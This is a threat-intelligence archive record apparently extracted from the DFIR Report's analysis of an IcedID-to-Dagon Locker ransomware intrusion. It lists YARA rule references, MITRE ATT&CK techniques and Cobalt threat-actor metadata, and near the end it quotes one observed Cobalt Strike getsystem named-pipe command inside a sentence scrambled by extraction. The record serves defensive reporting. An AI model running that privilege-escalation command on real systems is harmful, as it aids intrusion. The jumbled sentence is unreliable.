41\n\ninformational_AdFind_AD_Recon_and_Admin_Tool\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/5426/5426.yar\r\nAdfind\r\nhttps://github.com/bartblaze/Yara-rules/blob/master/rules/hacktools/Adfind.yar\r\nnbtscan_utility_softcell\r\nhttps://github.com/advanced-threat-research/Yara-Rules/blob/master/APT/APT_Operation_SoftCell.yar\r\nWindows_Trojan_CobaltStrike_7f8da98a\r\nhttps://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.ya\r\nMITRE ATT\u0026CK\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 38 of 41\n\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 39 of 41\n\nAccess Token Manipulation - T1134\r\nArchive via Utility - T1560.001\r\nData Encrypted for Impact - T1486\r\nDisable or Modify System Firewall - T1562.004\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExfiltration to Cloud Storage - T1567.002\r\nFile and Directory Discovery - T1083\r\nInhibit System Recovery - T1490\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nNetwork Share Discovery - T1135\r\nProcess Injection - T1055\r\nRemote Access Software - T1219\r\nScheduled Task - T1053.005\r\nSystem Information Discovery - T1082\r\nSystem Language Discovery - T1614.001\r\nSystem Time Discovery - T1124\r\nWeb Protocols - T1071.001\r\nSMB/Windows Admin Shares - T1021.002\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nPowershell - T1059.001\r\nWindows Command Shell - T1059.003\r\nJavascript - T1059.007\r\nRundll32 - T1218.011\r\nCommand Obfuscation - T1027.010\r\nDomain Account - T1136.002\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 40 of 41\n\nCredentials In Files - T1552.001\r\nDisable or Modify Tools - T1562.001\r\nSystem Owner/User Discovery - T1033\r\nData from Network Shared Drive - T1039\r\nEncrypted Channel - T1573\r\nIngress Tool Transfer - T1105\r\nAutomated Exfiltration - T1020\r\nService Stop - T1489\r\nInternal case # TB23869 PR28513\r\nSource: https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nhttps://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\r\nPage 41 of 41\n\nTo obtain SYSTEM We saw the threat privileges, actor use variations the threat actor of this executed the getsystem which indicates Cobalt likely getsystem Strike functionality activity: multiple times.\nC:\\Windows\\system32\\cmd.exe /c echo 00e4f7418cd \u003e \\\\.\\pipe\\9090e9\n  Page 18 of 41",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/"
	],
	"report_names": [
		"from-icedid-to-dagon-locker-ransomware-in-29-days"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434586,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.pdf",
		"text": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.txt",
		"img": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.jpg"
	}
}